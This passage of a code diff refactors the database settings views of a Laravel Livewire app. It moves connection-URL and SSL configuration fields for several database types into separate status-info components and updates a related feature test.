+                        <x-forms.checkbox id="enableSsl" label="Enable SSL" wire:model.live="enableSsl"
+                            instantSave="instantSaveSSL" disabled
+                            helper="Database should be stopped to change this settings." canGate="update"
+                            :canResource="$database" />
+                    @endif
+                </div>
+                @if ($sslModeOptions && $enableSsl)
+                    <div class="mx-2">
+                        @if ($isExited)
+                            <x-forms.select id="sslMode" label="SSL Mode" wire:model.live="sslMode"
+                                instantSave="instantSaveSSL" :helper="$sslModeHelper" canGate="update"
+                                :canResource="$database">
+                                @foreach ($sslModeOptions as $value => $option)
+                                    <option value="{{ $value }}" title="{{ $option['title'] ?? '' }}">{{ $option['label'] }}</option>
+                                @endforeach
+                            </x-forms.select>
+                        @else
+                            <x-forms.select id="sslMode" label="SSL Mode" instantSave="instantSaveSSL" disabled
+                                helper="Database should be stopped to change this settings." canGate="update"
+                                :canResource="$database">
+                                @foreach ($sslModeOptions as $value => $option)
+                                    <option value="{{ $value }}" title="{{ $option['title'] ?? '' }}">{{ $option['label'] }}</option>
+                                @endforeach
+                            </x-forms.select>
+                        @endif
+                    </div>
+                @endif
+            </div>
+        </div>
+    @endif
+</div>
diff --git a/resources/views/livewire/project/database/clickhouse/general.blade.php b/resources/views/livewire/project/database/clickhouse/general.blade.php
index 9283172ad..acba65442 100644
--- a/resources/views/livewire/project/database/clickhouse/general.blade.php
+++ b/resources/views/livewire/project/database/clickhouse/general.blade.php
@@ -41,19 +41,8 @@
                     helper="A comma separated list of ports you would like to map to the host system.<br><span class='inline-block font-bold dark:text-warning'>Example</span>3000:5432,3002:5433"
                     canGate="update" :canResource="$database" />
             </div>
-            <x-forms.input label="Clickhouse URL (internal)"
-                helper="If you change the user/password/port, this could be different. This is with the default values."
-                type="password" readonly wire:model="dbUrl" canGate="update" :canResource="$database" />
-            @if ($dbUrlPublic)
-                <x-forms.input label="Clickhouse URL (public)"
-                    helper="If you change the user/password/port, this could be different. This is with the default values."
-                    type="password" readonly wire:model="dbUrlPublic" canGate="update" :canResource="$database" />
-            @else
-                <x-forms.input label="Clickhouse URL (public)"
-                    helper="If you change the user/password/port, this could be different. This is with the default values."
-                    readonly value="Starting the database will generate this." canGate="update" :canResource="$database" />
-            @endif
         </div>
+        <livewire:project.database.clickhouse.status-info :database="$database" />
             <div class="flex flex-col py-2 w-64">
                 <div class="flex items-center gap-2 pb-2">
                     <div class="flex items-center">
diff --git a/resources/views/livewire/project/database/dragonfly/general.blade.php b/resources/views/livewire/project/database/dragonfly/general.blade.php
index ce46e47dd..7f217f0cc 100644
--- a/resources/views/livewire/project/database/dragonfly/general.blade.php
+++ b/resources/views/livewire/project/database/dragonfly/general.blade.php
@@ -37,60 +37,8 @@
                     helper="A comma separated list of ports you would like to map to the host system.<br><span class='inline-block font-bold dark:text-warning'>Example</span>3000:5432,3002:5433"
                     canGate="update" :canResource="$database" />
             </div>
-            <x-forms.input label="Dragonfly URL (internal)"
-                helper="If you change the user/password/port, this could be different. This is with the default values."
-                type="password" readonly wire:model="dbUrl" canGate="update" :canResource="$database" />
-
-            @if ($dbUrlPublic)
-                <x-forms.input label="Dragonfly URL (public)"
-                    helper="If you change the user/password/port, this could be different. This is with the default values."
-                    type="password" readonly wire:model="dbUrlPublic" canGate="update" :canResource="$database" />
-            @else
-                <x-forms.input label="Dragonfly URL (public)"
-                    helper="If you change the user/password/port, this could be different. This is with the default values."
-                    readonly value="Starting the database will generate this." canGate="update" :canResource="$database" />
-            @endif
-        </div>
-        <div class="flex flex-col gap-2">
-            <div class="flex items-center justify-between py-2">
-                <div class="flex items-center justify-between w-full">
-                    <h3>SSL Configuration</h3>
-                    @if ($database->enable_ssl && $certificateValidUntil)
-                        <x-modal-confirmation title="Regenerate SSL Certificates"
-                            buttonTitle="Regenerate SSL Certificates" :actions="[
-                                'The SSL certificate of this database will be regenerated.',
-                                'You must restart the database after regenerating the certificate to start using the new certificate.',
-                            ]"
-                            submitAction="regenerateSslCertificate" :confirmWithText="false" :confirmWithPassword="false" />
-                    @endif
-                </div>
-            </div>
-            @if ($database->enable_ssl && $certificateValidUntil)
-                <span class="text-sm">Valid until:
-                    @if (now()->gt($certificateValidUntil))
-                        <span class="text-red-500">{{ $certificateValidUntil->format('d.m.Y H:i:s') }} - Expired</span>
-                    @elseif(now()->addDays(30)->gt($certificateValidUntil))
-                        <span class="text-red-500">{{ $certificateValidUntil->format('d.m.Y H:i:s') }} - Expiring
-                            soon</span>
-                    @else
-                        <span>{{ $certificateValidUntil->format('d.m.Y H:i:s') }}</span>
-                    @endif
-                </span>
-            @endif
-            <div class="flex flex-col gap-2">
-                <div class="w-64">
-                    @if (str($database->status)->contains('exited'))
-                        <x-forms.checkbox id="enable_ssl" label="Enable SSL" wire:model.live="enable_ssl"
-                            instantSave="instantSaveSSL" canGate="update" :canResource="$database" />
-                    @else
-                        <x-forms.checkbox id="enable_ssl" label="Enable SSL" wire:model.live="enable_ssl"
-                            instantSave="instantSaveSSL" disabled
-                            helper="Database should be stopped to change this settings." canGate="update"
-                            :canResource="$database" />
-                    @endif
-                </div>
-            </div>
         </div>
+        <livewire:project.database.dragonfly.status-info :database="$database" />
         <div>
             <div class="flex flex-col py-2 w-64">
                 <div class="flex items-center gap-2 pb-2">
diff --git a/resources/views/livewire/project/database/keydb/general.blade.php b/resources/views/livewire/project/database/keydb/general.blade.php
index ee3f8fd0c..fa241dec2 100644
--- a/resources/views/livewire/project/database/keydb/general.blade.php
+++ b/resources/views/livewire/project/database/keydb/general.blade.php
@@ -38,59 +38,8 @@
                     helper="A comma separated list of ports you would like to map to the host system.<br><span class='inline-block font-bold dark:text-warning'>Example</span>3000:5432,3002:5433"
                     canGate="update" :canResource="$database" />
             </div>
-            <x-forms.input label="KeyDB URL (internal)"
-                helper="If you change the user/password/port, this could be different. This is with the default values."
-                type="password" readonly wire:model="dbUrl" canGate="update" :canResource="$database" />
-            @if ($dbUrlPublic)
-                <x-forms.input label="KeyDB URL (public)"
-                    helper="If you change the user/password/port, this could be different. This is with the default values."
-                    type="password" readonly wire:model="dbUrlPublic" canGate="update" :canResource="$database" />
-            @else
-                <x-forms.input label="KeyDB URL (public)"
-                    helper="If you change the user/password/port, this could be different. This is with the default values."
-                    readonly value="Starting the database will generate this." canGate="update" :canResource="$database" />
-            @endif
-        </div>
-        <div class="flex flex-col gap-2">
-            <div class="flex items-center justify-between py-2">
-                <div class="flex items-center justify-between w-full">
-                    <h3>SSL Configuration</h3>
-                    @if ($database->enable_ssl && $certificateValidUntil)
-                        <x-modal-confirmation title="Regenerate SSL Certificates"
-                            buttonTitle="Regenerate SSL Certificates" :actions="[
-                                'The SSL certificate of this database will be regenerated.',
-                                'You must restart the database after regenerating the certificate to start using the new certificate.',
-                            ]"
-                            submitAction="regenerateSslCertificate" :confirmWithText="false" :confirmWithPassword="false" />
-                    @endif
-                </div>
-            </div>
-            @if ($database->enable_ssl && $certificateValidUntil)
-                <span class="text-sm">Valid until:
-                    @if (now()->gt($certificateValidUntil))
-                        <span class="text-red-500">{{ $certificateValidUntil->format('d.m.Y H:i:s') }} - Expired</span>
-                    @elseif(now()->addDays(30)->gt($certificateValidUntil))
-                        <span class="text-red-500">{{ $certificateValidUntil->format('d.m.Y H:i:s') }} - Expiring
-                            soon</span>
-                    @else
-                        <span>{{ $certificateValidUntil->format('d.m.Y H:i:s') }}</span>
-                    @endif
-                </span>
-            @endif
-            <div class="flex flex-col gap-2">
-                <div class="w-64">
-                    @if (str($database->status)->contains('exited'))
-                        <x-forms.checkbox id="enable_ssl" label="Enable SSL" wire:model.live="enable_ssl"
-                            instantSave="instantSaveSSL" canGate="update" :canResource="$database" />
-                    @else
-                        <x-forms.checkbox id="enable_ssl" label="Enable SSL" wire:model.live="enable_ssl"
-                            instantSave="instantSaveSSL" disabled
-                            helper="Database should be stopped to change this settings." canGate="update"
-                            :canResource="$database" />
-                    @endif
-                </div>
-            </div>
         </div>
+        <livewire:project.database.keydb.status-info :database="$database" />
         <div>
             <div class="flex flex-col py-2 w-64">
                 <div class="flex items-center gap-2 pb-2">
diff --git a/resources/views/livewire/project/database/mariadb/general.blade.php b/resources/views/livewire/project/database/mariadb/general.blade.php
index 1154124d1..b29b3e81e 100644
--- a/resources/views/livewire/project/database/mariadb/general.blade.php
+++ b/resources/views/livewire/project/database/mariadb/general.blade.php
@@ -61,59 +61,9 @@
                     helper="A comma separated list of ports you would like to map to the host system.<br><span class='inline-block font-bold dark:text-warning'>Example</span>3000:5432,3002:5433"
                     canGate="update" :canResource="$database" />
             </div>
-            <x-forms.input label="MariaDB URL (internal)"
-                helper="If you change the user/password/port, this could be different. This is with the default values."
-                type="password" readonly wire:model="db_url" canGate="update" :canResource="$database" />
-            @if ($db_url_public)
-                <x-forms.input label="MariaDB URL (public)"
-                    helper="If you change the user/password/port, this could be different. This is with the default values."
-                    type="password" readonly wire:model="db_url_public" canGate="update" :canResource="$database" />
-            @endif
         </div>
 
-        <div class="flex flex-col gap-2">
-            <div class="flex items-center justify-between py-2">
-                <div class="flex items-center justify-between w-full">
-                    <h3>SSL Configuration</h3>
-                    @if ($enableSsl && $certificateValidUntil)
-                        <x-modal-confirmation title="Regenerate SSL Certificates"
-                            buttonTitle="Regenerate SSL Certificates" :actions="[
-                                'The SSL certificate of this database will be regenerated.',
-                                'You must restart the database after regenerating the certificate to start using the new certificate.',
-                            ]"
-                            submitAction="regenerateSslCertificate" :confirmWithText="false" :confirmWithPassword="false" />
-                    @endif
-                </div>
-            </div>
-            @if ($enableSsl && $certificateValidUntil)
-                <span class="text-sm">Valid until:
-                    @if (now()->gt($certificateValidUntil))
-                        <span class="text-red-500">{{ $certificateValidUntil->format('d.m.Y H:i:s') }} - Expired</span>
-                    @elseif(now()->addDays(30)->gt($certificateValidUntil))
-                        <span class="text-red-500">{{ $certificateValidUntil->format('d.m.Y H:i:s') }} - Expiring
-                            soon</span>
-                    @else
-                        <span>{{ $certificateValidUntil->format('d.m.Y H:i:s') }}</span>
-                    @endif
-                </span>
-            @endif
-        </div>
-        <div class="flex flex-col gap-2">
-            <div class="flex flex-col gap-2">
-                <div class="w-64">
-                    @if (str($database->status)->contains('exited'))
-                        <x-forms.checkbox id="enableSsl" label="Enable SSL"
-                            wire:model.live="enableSsl" instantSave="instantSaveSSL" canGate="update"
-                            :canResource="$database" />
-                    @else
-                        <x-forms.checkbox id="enableSsl" label="Enable SSL"
-                            wire:model.live="enableSsl" instantSave="instantSaveSSL" disabled
-                            helper="Database should be stopped to change this settings." canGate="update"
-                            :canResource="$database" />
-                    @endif
-                </div>
-            </div>
-        </div>
+        <livewire:project.database.mariadb.status-info :database="$database" />
 
         <div>
             <div class="flex flex-col py-2 w-64">
diff --git a/resources/views/livewire/project/database/mongodb/general.blade.php b/resources/views/livewire/project/database/mongodb/general.blade.php
index e9e5d621d..c1ec60219 100644
--- a/resources/views/livewire/project/database/mongodb/general.blade.php
+++ b/resources/views/livewire/project/database/mongodb/general.blade.php
@@ -50,85 +50,10 @@
                     helper="A comma separated list of ports you would like to map to the host system.<br><span class='inline-block font-bold dark:text-warning'>Example</span>3000:5432,3002:5433"
                     canGate="update" :canResource="$database" />
             </div>
-            <x-forms.input label="Mongo URL (internal)"
-                helper="If you change the user/password/port, this could be different. This is with the default values."
-                type="password" readonly wire:model="db_url" canGate="update" :canResource="$database" />
-            @if ($db_url_public)
-                <x-forms.input label="Mongo URL (public)"
-                    helper="If you change the user/password/port, this could be different. This is with the default values."
-                    type="password" readonly wire:model="db_url_public" canGate="update" :canResource="$database" />
-            @endif
         </div>
 
+        <livewire:project.database.mongodb.status-info :database="$database" />
         <div class="flex flex-col gap-2">
-            <div class="flex items-center justify-between py-2">
-                <div class="flex items-center justify-between w-full">
-                    <h3>SSL Configuration</h3>
-                    @if ($enableSsl)
-                        <x-modal-confirmation title="Regenerate SSL Certificates"
-                            buttonTitle="Regenerate SSL Certificates" :actions="[
-                                'The SSL certificate of this database will be regenerated.',
-                                'You must restart the database after regenerating the certificate to start using the new certificate.',
-                            ]"
-                            submitAction="regenerateSslCertificate" :confirmWithText="false" :confirmWithPassword="false" />
-                    @endif
-                </div>
-            </div>
-            @if ($enableSsl && $certificateValidUntil)
-                <span class="text-sm">Valid until:
-                    @if (now()->gt($certificateValidUntil))
-                        <span class="text-red-500">{{ $certificateValidUntil->format('d.m.Y H:i:s') }} - Expired</span>
-                    @elseif(now()->addDays(30)->gt($certificateValidUntil))
-                        <span class="text-red-500">{{ $certificateValidUntil->format('d.m.Y H:i:s') }} - Expiring
-                            soon</span>
-                    @else
-                        <span>{{ $certificateValidUntil->format('d.m.Y H:i:s') }}</span>
-                    @endif
-                </span>
-            @endif
-        </div>
-        <div class="flex flex-col gap-2">
-            <div class="flex flex-col gap-2">
-                <div class="w-64">
-                    @if (str($database->status)->contains('exited'))
-                        <x-forms.checkbox id="enableSsl" label="Enable SSL"
-                            wire:model.live="enableSsl" instantSave="instantSaveSSL" canGate="update"
-                            :canResource="$database" />
-                    @else
-                        <x-forms.checkbox id="enableSsl" label="Enable SSL"
-                            wire:model.live="enableSsl" instantSave="instantSaveSSL" disabled
-                            helper="Database should be stopped to change this settings." canGate="update"
-                            :canResource="$database" />
-                    @endif
-                </div>
-                @if ($enableSsl)
-                    <div class="mx-2">
-                        @if (str($database->status)->contains('exited'))
-                            <x-forms.select id="sslMode" label="SSL Mode" wire:model.live="sslMode"
-                                instantSave="instantSaveSSL"
-                                helper="Choose the SSL verification mode for MongoDB connections" canGate="update"
-                                :canResource="$database">
-                                <option value="allow" title="Allow insecure connections">allow (insecure)</option>
-                                <option value="prefer" title="Prefer secure connections">prefer (secure)</option>
-                                <option value="require" title="Require secure connections">require (secure)</option>
-                                <option value="verify-full" title="Verify full certificate">verify-full (secure)
-                                </option>
-                            </x-forms.select>
-                        @else
-                            <x-forms.select id="sslMode" label="SSL Mode" instantSave="instantSaveSSL"
-                                disabled helper="Database should be stopped to change this settings." canGate="update"
-                                :canResource="$database">
-                                <option value="allow" title="Allow insecure connections">allow (insecure)</option>
-                                <option value="prefer" title="Prefer secure connections">prefer (secure)</option>
-                                <option value="require" title="Require secure connections">require (secure)</option>
-                                <option value="verify-full" title="Verify full certificate">verify-full (secure)
-                                </option>
-                            </x-forms.select>
-                        @endif
-                    </div>
-                @endif
-            </div>
-
             <div>
                 <div class="flex flex-col py-2 w-64">
                     <div class="flex items-center gap-2 pb-2">
diff --git a/resources/views/livewire/project/database/mysql/general.blade.php b/resources/views/livewire/project/database/mysql/general.blade.php
index bb3916ec8..e90885e7c 100644
--- a/resources/views/livewire/project/database/mysql/general.blade.php
+++ b/resources/views/livewire/project/database/mysql/general.blade.php
@@ -56,81 +56,9 @@
                 <x-forms.input placeholder="3000:5432" id="portsMappings" label="Ports Mappings"
                     helper="A comma separated list of ports you would like to map to the host system.<br><span class='inline-block font-bold dark:text-warning'>Example</span>3000:5432,3002:5433" canGate="update" :canResource="$database" />
             </div>
-            <x-forms.input label="MySQL URL (internal)"
-                helper="If you change the user/password/port, this could be different. This is with the default values."
-                type="password" readonly wire:model="db_url" />
-            @if ($db_url_public)
-                <x-forms.input label="MySQL URL (public)"
-                    helper="If you change the user/password/port, this could be different. This is with the default values."
-                    type="password" readonly wire:model="db_url_public" />
-            @endif
         </div>
 
-        <div class="flex flex-col gap-2">
-            <div class="flex items-center justify-between py-2">
-                <div class="flex items-center justify-between w-full">
-                    <h3>SSL Configuration</h3>
-                    @if ($enableSsl && $certificateValidUntil)
-                        <x-modal-confirmation title="Regenerate SSL Certificates"
-                            buttonTitle="Regenerate SSL Certificates" :actions="[
-                                'The SSL certificate of this database will be regenerated.',
-                                'You must restart the database after regenerating the certificate to start using the new certificate.',
-                            ]"
-                            submitAction="regenerateSslCertificate" :confirmWithText="false" :confirmWithPassword="false" />
-                    @endif
-                </div>
-            </div>
-            @if ($enableSsl && $certificateValidUntil)
-                <span class="text-sm">Valid until:
-                    @if (now()->gt($certificateValidUntil))
-                        <span class="text-red-500">{{ $certificateValidUntil->format('d.m.Y H:i:s') }} - Expired</span>
-                    @elseif(now()->addDays(30)->gt($certificateValidUntil))
-                        <span class="text-red-500">{{ $certificateValidUntil->format('d.m.Y H:i:s') }} - Expiring
-                            soon</span>
-                    @else
-                        <span>{{ $certificateValidUntil->format('d.m.Y H:i:s') }}</span>
-                    @endif
-                </span>
-            @endif
-        </div>
-        <div class="flex flex-col gap-2">
-            <div class="flex flex-col gap-2">
-                <div class="w-64">
-                    @if (str($database->status)->contains('exited'))
-                        <x-forms.checkbox id="enableSsl" label="Enable SSL"
-                            wire:model.live="enableSsl" instantSave="instantSaveSSL" canGate="update" :canResource="$database" />
-                    @else
-                        <x-forms.checkbox id="enableSsl" label="Enable SSL"
-                            wire:model.live="enableSsl" instantSave="instantSaveSSL" disabled
-                            helper="Database should be stopped to change this settings." />
-                    @endif
-                </div>
-                @if ($enableSsl)
-                    <div class="mx-2">
-                        @if (str($database->status)->contains('exited'))
-                            <x-forms.select id="sslMode" label="SSL Mode" wire:model.live="sslMode"
-                                instantSave="instantSaveSSL"
-                                helper="Choose the SSL verification mode for MySQL connections" canGate="update" :canResource="$database">
-                                <option value="PREFERRED" title="Prefer secure connections">Prefer (secure)</option>
-                                <option value="REQUIRED" title="Require secure connections">Require (secure)</option>
-                                <option value="VERIFY_CA" title="Verify CA certificate">Verify CA (secure)</option>
-                                <option value="VERIFY_IDENTITY" title="Verify full certificate">Verify Full (secure)
-                                </option>
-                            </x-forms.select>
-                        @else
-                            <x-forms.select id="sslMode" label="SSL Mode" instantSave="instantSaveSSL"
-                                disabled helper="Database should be stopped to change this settings.">
-                                <option value="PREFERRED" title="Prefer secure connections">Prefer (secure)</option>
-                                <option value="REQUIRED" title="Require secure connections">Require (secure)</option>
-                                <option value="VERIFY_CA" title="Verify CA certificate">Verify CA (secure)</option>
-                                <option value="VERIFY_IDENTITY" title="Verify full certificate">Verify Full (secure)
-                                </option>
-                            </x-forms.select>
-                        @endif
-                    </div>
-                @endif
-            </div>
-        </div>
+        <livewire:project.database.mysql.status-info :database="$database" />
 
         <div>
             <div class="flex flex-col py-2 w-64">
diff --git a/resources/views/livewire/project/database/postgresql/general.blade.php b/resources/views/livewire/project/database/postgresql/general.blade.php
index 9c956f5b3..ab6f6ed88 100644
--- a/resources/views/livewire/project/database/postgresql/general.blade.php
+++ b/resources/views/livewire/project/database/postgresql/general.blade.php
@@ -68,114 +68,38 @@
                     helper="A comma separated list of ports you would like to map to the host system.<br><span class='inline-block font-bold dark:text-warning'>Example</span>3000:5432,3002:5433"
                     canGate="update" :canResource="$database" />
             </div>
-
-            <x-forms.input label="Postgres URL (internal)"
-                helper="If you change the user/password/port, this could be different. This is with the default values."
-                type="password" readonly wire:model="db_url" />
-            @if ($db_url_public)
-                <x-forms.input label="Postgres URL (public)"
-                    helper="If you change the user/password/port, this could be different. This is with the default values."
-                    type="password" readonly wire:model="db_url_public" />
-            @endif
         </div>
+        <livewire:project.database.postgresql.status-info :database="$database" />
         <div class="flex flex-col gap-2">
             <div class="flex items-center gap-2 py-2">
-                <h3>SSL Configuration</h3>
-                @if ($enableSsl && $certificateValidUntil)
-                    <x-modal-confirmation title="Regenerate SSL Certificates" buttonTitle="Regenerate SSL Certificates"
-                        :actions="[
-                            'The SSL certificate of this database will be regenerated.',
-                            'You must restart the database after regenerating the certificate to start using the new certificate.',
-                        ]" submitAction="regenerateSslCertificate" :confirmWithText="false"
-                        :confirmWithPassword="false" />
+                <h3>Proxy</h3>
+                <x-loading wire:loading wire:target="instantSave" />
+                @if (data_get($database, 'is_public'))
+                    <x-slide-over fullScreen>
+                        <x-slot:title>Proxy Logs</x-slot:title>
+                        <x-slot:content>
+                            <livewire:project.shared.get-logs :server="$server" :resource="$database"
+                                container="{{ data_get($database, 'uuid') }}-proxy" :collapsible="false" lazy />
+                        </x-slot:content>
+                        <x-forms.button disabled="{{ !data_get($database, 'is_public') }}"
+                            @click="slideOverOpen=true">Logs</x-forms.button>
+                    </x-slide-over>
                 @endif
             </div>
-            @if ($enableSsl && $certificateValidUntil)
-                <span class="text-sm">Valid until:
-                    @if (now()->gt($certificateValidUntil))
-                        <span class="text-red-500">{{ $certificateValidUntil->format('d.m.Y H:i:s') }} - Expired</span>
-                    @elseif(now()->addDays(30)->gt($certificateValidUntil))
-                        <span class="text-red-500">{{ $certificateValidUntil->format('d.m.Y H:i:s') }} - Expiring
-                            soon</span>
-                    @else
-                        <span>{{ $certificateValidUntil->format('d.m.Y H:i:s') }}</span>
-                    @endif
-                </span>
-            @endif
+            <div class="flex flex-col gap-2 w-64">
+                <x-forms.checkbox instantSave id="isPublic" label="Make it publicly available"
+                    canGate="update" :canResource="$database" />
+            </div>
+            <div class="flex flex-col gap-2">
+                <x-forms.input type="number" placeholder="5432" disabled="{{ $isPublic }}" id="publicPort"
+                    label="Public Port" canGate="update" :canResource="$database" />
+                <x-forms.input type="number" placeholder="3600" disabled="{{ $isPublic }}" id="publicPortTimeout"
+                    label="Proxy Timeout (seconds)" helper="Timeout for the public TCP proxy connection in seconds. Default: 3600 (1 hour)." canGate="update" :canResource="$database" />
+            </div>
         </div>
         <div class="flex flex-col gap-2">
-            <div class="flex flex-col gap-2">
-                <div class="w-64" wire:key='enable_ssl'>
-                    @if ($database->isExited())
-                        <x-forms.checkbox id="enableSsl" label="Enable SSL" wire:model.live="enableSsl"
-                            instantSave="instantSaveSSL" canGate="update" :canResource="$database" />
-                    @else
-                        <x-forms.checkbox id="enableSsl" label="Enable SSL" wire:model.live="enableSsl"
-                            instantSave="instantSaveSSL" disabled
-                            helper="Database should be stopped to change this settings." />
-                    @endif
-                </div>
-                @if ($enableSsl)
-                    <div class="mx-2">
-                        @if ($database->isExited())
-                            <x-forms.select id="sslMode" label="SSL Mode" wire:model.live="sslMode"
-                                instantSave="instantSaveSSL"
-                                helper="Choose the SSL verification mode for PostgreSQL connections" canGate="update"
-                                :canResource="$database">
-                                <option value="allow" title="Allow insecure connections">allow (insecure)</option>
-                                <option value="prefer" title="Prefer secure connections">prefer (secure)</option>
-                                <option value="require" title="Require secure connections">require (secure)</option>
-                                <option value="verify-ca" title="Verify CA certificate">verify-ca (secure)</option>
-                                <option value="verify-full" title="Verify full certificate">verify-full (secure)
-                                </option>
-                            </x-forms.select>
-                        @else
-                            <x-forms.select id="sslMode" label="SSL Mode" instantSave="instantSaveSSL" disabled
-                                helper="Database should be stopped to change this settings.">
-                                <option value="allow" title="Allow insecure connections">allow (insecure)</option>
-                                <option value="prefer" title="Prefer secure connections">prefer (secure)</option>
-                                <option value="require" title="Require secure connections">require (secure)</option>
-                                <option value="verify-ca" title="Verify CA certificate">verify-ca (secure)</option>
-                                <option value="verify-full" title="Verify full certificate">verify-full (secure)
-                                </option>
-                            </x-forms.select>
-                        @endif
-                    </div>
-                @endif
-
-                <div class="flex flex-col gap-2">
-                    <div class="flex items-center gap-2 py-2">
-                        <h3>Proxy</h3>
-                        <x-loading wire:loading wire:target="instantSave" />
-                        @if (data_get($database, 'is_public'))
-                            <x-slide-over fullScreen>
-                                <x-slot:title>Proxy Logs</x-slot:title>
-                                <x-slot:content>
-                                    <livewire:project.shared.get-logs :server="$server" :resource="$database"
-                                        container="{{ data_get($database, 'uuid') }}-proxy" :collapsible="false" lazy />
-                                </x-slot:content>
-                                <x-forms.button disabled="{{ !data_get($database, 'is_public') }}"
-                                    @click="slideOverOpen=true">Logs</x-forms.button>
-                            </x-slide-over>
-                        @endif
-                    </div>
-                    <div class="flex flex-col gap-2 w-64">
-                        <x-forms.checkbox instantSave id="isPublic" label="Make it publicly available"
-                            canGate="update" :canResource="$database" />
-                    </div>
-                    <div class="flex flex-col gap-2">
-                        <x-forms.input type="number" placeholder="5432" disabled="{{ $isPublic }}" id="publicPort"
-                            label="Public Port" canGate="update" :canResource="$database" />
-                        <x-forms.input type="number" placeholder="3600" disabled="{{ $isPublic }}" id="publicPortTimeout"
-                            label="Proxy Timeout (seconds)" helper="Timeout for the public TCP proxy connection in seconds. Default: 3600 (1 hour)." canGate="update" :canResource="$database" />
-                    </div>
-                </div>
-
-                <div class="flex flex-col gap-2">
-                    <x-forms.textarea label="Custom PostgreSQL Configuration" rows="10" id="postgresConf"
-                        canGate="update" :canResource="$database" />
-                </div>
-            </div>
+            <x-forms.textarea label="Custom PostgreSQL Configuration" rows="10" id="postgresConf"
+                canGate="update" :canResource="$database" />
         </div>
     </form>
 
diff --git a/resources/views/livewire/project/database/redis/status-info.blade.php b/resources/views/livewire/project/database/redis/status-info.blade.php
deleted file mode 100644
index 9f329504c..000000000
--- a/resources/views/livewire/project/database/redis/status-info.blade.php
+++ /dev/null
@@ -1,51 +0,0 @@
-<div class="flex flex-col gap-2">
-    <x-forms.input label="Redis URL (internal)"
-        helper="If you change the user/password/port, this could be different. This is with the default values."
-        type="password" readonly wire:model="dbUrl" canGate="update" :canResource="$database" />
-    @if ($dbUrlPublic)
-        <x-forms.input label="Redis URL (public)"
-            helper="If you change the user/password/port, this could be different. This is with the default values."
-            type="password" readonly wire:model="dbUrlPublic" canGate="update" :canResource="$database" />
-    @endif
-    <div class="flex flex-col gap-2 pt-4">
-        <div class="flex items-center justify-between py-2">
-            <div class="flex items-center justify-between w-full">
-                <h3>SSL Configuration</h3>
-                @if ($enableSsl && $certificateValidUntil)
-                    <x-modal-confirmation title="Regenerate SSL Certificates"
-                        buttonTitle="Regenerate SSL Certificates" :actions="[
-                            'The SSL certificate of this database will be regenerated.',
-                            'You must restart the database after regenerating the certificate to start using the new certificate.',
-                        ]"
-                        submitAction="regenerateSslCertificate" :confirmWithText="false" :confirmWithPassword="false" />
-                @endif
-            </div>
-        </div>
-        @if ($enableSsl && $certificateValidUntil)
-            <span class="text-sm">Valid until:
-                @if (now()->gt($certificateValidUntil))
-                    <span class="text-red-500">{{ $certificateValidUntil->format('d.m.Y H:i:s') }} - Expired</span>
-                @elseif(now()->addDays(30)->gt($certificateValidUntil))
-                    <span class="text-red-500">{{ $certificateValidUntil->format('d.m.Y H:i:s') }} - Expiring
-                        soon</span>
-                @else
-                    <span>{{ $certificateValidUntil->format('d.m.Y H:i:s') }}</span>
-                @endif
-            </span>
-        @endif
-        <div class="flex flex-col gap-2">
-            <div class="w-64" wire:key='enable_ssl'>
-                @if (str($database->status)->contains('exited'))
-                    <x-forms.checkbox id="enableSsl" label="Enable SSL"
-                        wire:model.live="enableSsl" instantSave="instantSaveSSL" canGate="update"
-                        :canResource="$database" />
-                @else
-                    <x-forms.checkbox id="enableSsl" label="Enable SSL"
-                        wire:model.live="enableSsl" instantSave="instantSaveSSL" disabled
-                        helper="Database should be stopped to change this settings." canGate="update"
-                        :canResource="$database" />
-                @endif
-            </div>
-        </div>
-    </div>
-</div>
diff --git a/resources/views/livewire/project/database/status-info.blade.php b/resources/views/livewire/project/database/status-info.blade.php
new file mode 100644
index 000000000..7107b3daf
--- /dev/null
+++ b/resources/views/livewire/project/database/status-info.blade.php
@@ -0,0 +1,6 @@
+<div>
+    <x-database-status-info :database="$database" :label="$label" :db-url="$dbUrl" :db-url-public="$dbUrlPublic"
+        :enable-ssl="$enableSsl" :ssl-mode="$sslMode" :certificate-valid-until="$certificateValidUntil"
+        :supports-ssl="$supportsSsl" :ssl-mode-options="$sslModeOptions" :ssl-mode-helper="$sslModeHelper"
+        :show-public-url-placeholder="$showPublicUrlPlaceholder" :is-exited="$isExited" />
+</div>
diff --git a/tests/Feature/DatabaseSslStatusRefreshTest.php b/tests/Feature/DatabaseSslStatusRefreshTest.php
index b663213a5..7b0e4c0a3 100644
--- a/tests/Feature/DatabaseSslStatusRefreshTest.php
+++ b/tests/Feature/DatabaseSslStatusRefreshTest.php
@@ -1,11 +1,19 @@
 <?php
 
+use App\Livewire\Project\Database\Clickhouse\General as ClickhouseGeneral;
+use App\Livewire\Project\Database\Clickhouse\StatusInfo as ClickhouseStatusInfo;
 use App\Livewire\Project\Database\Dragonfly\General as DragonflyGeneral;
+use App\Livewire\Project\Database\Dragonfly\StatusInfo as DragonflyStatusInfo;
 use App\Livewire\Project\Database\Keydb\General as KeydbGeneral;
+use App\Livewire\Project\Database\Keydb\StatusInfo as KeydbStatusInfo;
 use App\Livewire\Project\Database\Mariadb\General as MariadbGeneral;
+use App\Livewire\Project\Database\Mariadb\StatusInfo as MariadbStatusInfo;
 use App\Livewire\Project\Database\Mongodb\General as MongodbGeneral;
+use App\Livewire\Project\Database\Mongodb\StatusInfo as MongodbStatusInfo;
 use App\Livewire\Project\Database\Mysql\General as MysqlGeneral;
+use App\Livewire\Project\Database\Mysql\StatusInfo as MysqlStatusInfo;
 use App\Livewire\Project\Database\Postgresql\General as PostgresqlGeneral;
+use App\Livewire\Project\Database\Postgresql\StatusInfo as PostgresqlStatusInfo;
 use App\Livewire\Project\Database\Redis\General as RedisGeneral;
 use App\Livewire\Project\Database\Redis\StatusInfo as RedisStatusInfo;
 use App\Livewire\Server\Sentinel;
@@ -15,7 +23,6 @@
 use App\Models\Server;
 use App\Models\StandaloneDocker;
 use App\Models\StandaloneMysql;
-use App\Models\StandalonePostgresql;
 use App\Models\StandaloneRedis;
 use App\Models\Team;
 use App\Models\User;
@@ -34,30 +41,35 @@
 });
 
 dataset('database-general-forms-without-broadcasts', [
-    // Redis splits status-derived display into a sibling component; the form itself
-    // takes no broadcast listeners. Other DBs use the narrower refreshStatus pattern below.
+    // Status-derived display moved into a sibling StatusInfo component for each DB,
+    // so the form itself takes no broadcast listeners and cannot clobber wire:dirty
+    // by absorbing deferred wire:model values during a status-triggered roundtrip.
     RedisGeneral::class,
-]);
-
-dataset('database-general-forms-with-narrow-refresh', [
-    // Form listens to status broadcasts but routes them to refreshStatus, which only
